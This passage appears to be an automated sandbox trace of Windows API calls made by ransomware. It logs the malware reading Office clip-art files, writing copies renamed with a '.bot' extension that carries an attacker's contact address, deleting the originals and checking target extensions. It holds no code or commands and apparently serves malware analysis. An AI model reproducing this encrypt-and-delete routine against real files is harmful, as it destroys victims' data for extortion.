	[0148.688] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01875_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec
	[0148.689] GetLastError () returned 0x0
	[0148.689] ReadFile (in: hFile=0x3e8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0xa38, lpOverlapped=0x0) returned 1
	[0148.691] WriteFile (in: hFile=0x3ec, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xa40, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xa40, lpOverlapped=0x0) returned 1
	[0148.692] ReadFile (in: hFile=0x3e8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.692] WriteFile (in: hFile=0x3ec, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0148.692] SetEndOfFile (hFile=0x3ec) returned 1
	[0148.692] CloseHandle (hObject=0x3ec) returned 1
	[0148.692] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.692] SetEndOfFile (hFile=0x3e8) returned 1
	[0148.694] CloseHandle (hObject=0x3e8) returned 1
	[0148.694] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.694] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01875_.wmf")) returned 1
	[0148.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF") returned 63
	[0148.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF") returned 63
	[0148.695] lstrlenW (lpString=".doc") returned 4
	[0148.695] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0148.695] lstrlenW (lpString=".docx") returned 5
	[0148.695] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0148.695] lstrlenW (lpString=".pdf") returned 4
	[0148.695] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0148.695] lstrlenW (lpString=".xls") returned 4
	[0148.695] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0148.695] lstrlenW (lpString=".xlsx") returned 5
	[0148.695] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0148.695] lstrlenW (lpString=".ppt") returned 4
	[0148.695] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0148.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF") returned 63
	[0148.695] lstrlenW (lpString=".zip") returned 4
	[0148.695] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0148.695] lstrlenW (lpString=".rar") returned 4
	[0148.696] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0148.696] lstrlenW (lpString=".bz2") returned 4
	[0148.696] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0148.696] lstrlenW (lpString=".7z") returned 3
	[0148.696] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0148.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF") returned 63
	[0148.696] lstrlenW (lpString=".dbf") returned 4
	[0148.696] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0148.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF") returned 63
	[0148.696] lstrlenW (lpString=".1cd") returned 4
	[0148.696] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0148.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF") returned 63
	[0148.696] lstrlenW (lpString=".jpg") returned 4
	[0148.696] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0148.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF") returned 63
	[0148.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF") returned 63
	[0148.696] lstrlenW (lpString=".doc") returned 4
	[0148.696] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0148.696] lstrlenW (lpString=".docx") returned 5
	[0148.696] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0148.696] lstrlenW (lpString=".pdf") returned 4
	[0148.696] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0148.696] lstrlenW (lpString=".xls") returned 4
	[0148.696] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0148.696] lstrlenW (lpString=".xlsx") returned 5
	[0148.696] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0148.696] lstrlenW (lpString=".ppt") returned 4
	[0148.696] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0148.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF") returned 63
	[0148.696] lstrlenW (lpString=".zip") returned 4
	[0148.696] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0148.697] lstrlenW (lpString=".rar") returned 4
	[0148.697] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0148.697] lstrlenW (lpString=".bz2") returned 4
	[0148.697] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0148.697] lstrlenW (lpString=".7z") returned 3
	[0148.697] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0148.697] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF") returned 63
	[0148.697] lstrlenW (lpString=".dbf") returned 4
	[0148.697] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0148.697] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF") returned 63
	[0148.697] lstrlenW (lpString=".1cd") returned 4
	[0148.697] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0148.697] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF") returned 63
	[0148.697] lstrlenW (lpString=".jpg") returned 4
	[0148.697] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0148.697] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0148.697] lstrlenW (lpString="HH01923_.WMF") returned 12
	[0148.697] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01923_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0148.698] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=26706) returned 1
	[0148.698] CloseHandle (hObject=0x3e8) returned 1
	[0148.698] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01923_.wmf")) returned 0x20
	[0148.698] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01923_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.698] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01923_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0148.698] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.698] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.698] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01923_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec
	[0148.703] GetLastError () returned 0x0
	[0148.703] ReadFile (in: hFile=0x3e8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x6852, lpOverlapped=0x0) returned 1
	[0148.705] WriteFile (in: hFile=0x3ec, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x6860, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x6860, lpOverlapped=0x0) returned 1
	[0148.706] ReadFile (in: hFile=0x3e8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.706] WriteFile (in: hFile=0x3ec, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0148.707] SetEndOfFile (hFile=0x3ec) returned 1
	[0148.707] CloseHandle (hObject=0x3ec) returned 1
	[0148.707] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.707] SetEndOfFile (hFile=0x3e8) returned 1
	[0148.709] CloseHandle (hObject=0x3e8) returned 1
	[0148.709] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.709] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01923_.wmf")) returned 1
	[0148.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF") returned 63
	[0148.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF") returned 63
	[0148.710] lstrlenW (lpString=".doc") returned 4
	[0148.710] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0148.710] lstrlenW (lpString=".docx") returned 5
	[0148.710] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0148.710] lstrlenW (lpString=".pdf") returned 4
	[0148.710] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0148.710] lstrlenW (lpString=".xls") returned 4
	[0148.710] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0148.710] lstrlenW (lpString=".xlsx") returned 5
	[0148.710] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0148.710] lstrlenW (lpString=".ppt") returned 4
	[0148.710] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0148.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF") returned 63
	[0148.710] lstrlenW (lpString=".zip") returned 4
	[0148.710] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0148.711] lstrlenW (lpString=".rar") returned 4
	[0148.711] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0148.711] lstrlenW (lpString=".bz2") returned 4
	[0148.711] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0148.711] lstrlenW (lpString=".7z") returned 3
	[0148.711] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0148.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF") returned 63
	[0148.711] lstrlenW (lpString=".dbf") returned 4
	[0148.711] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0148.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF") returned 63
	[0148.711] lstrlenW (lpString=".1cd") returned 4
	[0148.711] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0148.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF") returned 63
	[0148.711] lstrlenW (lpString=".jpg") returned 4
	[0148.711] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0148.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF") returned 63
	[0148.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF") returned 63
	[0148.711] lstrlenW (lpString=".doc") returned 4
	[0148.711] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0148.711] lstrlenW (lpString=".docx") returned 5
	[0148.711] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0148.711] lstrlenW (lpString=".pdf") returned 4
	[0148.711] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0148.711] lstrlenW (lpString=".xls") returned 4
	[0148.711] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0148.711] lstrlenW (lpString=".xlsx") returned 5
	[0148.711] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0148.711] lstrlenW (lpString=".ppt") returned 4
	[0148.711] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0148.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF") returned 63
	[0148.711] lstrlenW (lpString=".zip") returned 4
	[0148.711] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0148.712] lstrlenW (lpString=".rar") returned 4
	[0148.712] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0148.712] lstrlenW (lpString=".bz2") returned 4
	[0148.712] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0148.712] lstrlenW (lpString=".7z") returned 3
	[0148.712] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0148.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF") returned 63
	[0148.712] lstrlenW (lpString=".dbf") returned 4
	[0148.712] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0148.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF") returned 63
	[0148.712] lstrlenW (lpString=".1cd") returned 4
	[0148.712] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0148.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF") returned 63
	[0148.712] lstrlenW (lpString=".jpg") returned 4
	[0148.712] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0148.712] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0148.712] lstrlenW (lpString="HH02155_.WMF") returned 12
	[0148.712] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02155_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0148.713] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=2704) returned 1
	[0148.713] CloseHandle (hObject=0x3e8) returned 1
	[0148.713] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02155_.wmf")) returned 0x20
	[0148.713] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02155_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.713] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02155_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0148.713] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.713] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.713] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02155_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec
	[0148.714] GetLastError () returned 0x0
	[0148.714] ReadFile (in: hFile=0x3e8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0xa90, lpOverlapped=0x0) returned 1
	[0148.902] WriteFile (in: hFile=0x3ec, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xaa0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xaa0, lpOverlapped=0x0) returned 1
	[0149.033] ReadFile (in: hFile=0x3e8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.033] WriteFile (in: hFile=0x3ec, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0149.033] SetEndOfFile (hFile=0x3ec) returned 1
	[0149.038] CloseHandle (hObject=0x3ec) returned 1
	[0149.038] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.039] SetEndOfFile (hFile=0x3e8) returned 1
	[0149.040] CloseHandle (hObject=0x3e8) returned 1
	[0149.040] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.152] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02155_.wmf")) returned 1
	[0149.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF") returned 63
	[0149.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF") returned 63
	[0149.152] lstrlenW (lpString=".doc") returned 4
	[0149.152] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.152] lstrlenW (lpString=".docx") returned 5
	[0149.152] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.153] lstrlenW (lpString=".pdf") returned 4
	[0149.153] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.153] lstrlenW (lpString=".xls") returned 4
	[0149.153] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.153] lstrlenW (lpString=".xlsx") returned 5
	[0149.153] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.153] lstrlenW (lpString=".ppt") returned 4
	[0149.153] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF") returned 63
	[0149.153] lstrlenW (lpString=".zip") returned 4
	[0149.153] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.153] lstrlenW (lpString=".rar") returned 4
	[0149.153] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.153] lstrlenW (lpString=".bz2") returned 4
	[0149.153] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.153] lstrlenW (lpString=".7z") returned 3
	[0149.153] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF") returned 63
	[0149.153] lstrlenW (lpString=".dbf") returned 4
	[0149.153] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF") returned 63
	[0149.153] lstrlenW (lpString=".1cd") returned 4
	[0149.153] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF") returned 63
	[0149.153] lstrlenW (lpString=".jpg") returned 4
	[0149.153] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF") returned 63
	[0149.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF") returned 63
	[0149.153] lstrlenW (lpString=".doc") returned 4
	[0149.154] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.154] lstrlenW (lpString=".docx") returned 5
	[0149.154] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.154] lstrlenW (lpString=".pdf") returned 4
	[0149.154] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.154] lstrlenW (lpString=".xls") returned 4
	[0149.154] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.154] lstrlenW (lpString=".xlsx") returned 5
	[0149.154] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.154] lstrlenW (lpString=".ppt") returned 4
	[0149.154] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.154] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF") returned 63
	[0149.154] lstrlenW (lpString=".zip") returned 4
	[0149.154] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.154] lstrlenW (lpString=".rar") returned 4
	[0149.154] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.154] lstrlenW (lpString=".bz2") returned 4
	[0149.154] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.154] lstrlenW (lpString=".7z") returned 3
	[0149.154] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.154] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF") returned 63
	[0149.154] lstrlenW (lpString=".dbf") returned 4
	[0149.154] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.154] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF") returned 63
	[0149.154] lstrlenW (lpString=".1cd") returned 4
	[0149.154] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.154] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF") returned 63
	[0149.154] lstrlenW (lpString=".jpg") returned 4
	[0149.154] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.155] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0149.155] lstrlenW (lpString="HM00114_.WMF") returned 12
	[0149.155] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00114_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.193] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=22116) returned 1
	[0149.193] CloseHandle (hObject=0x384) returned 1
	[0149.193] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00114_.wmf")) returned 0x20
	[0149.193] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00114_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.194] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00114_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.194] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.194] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
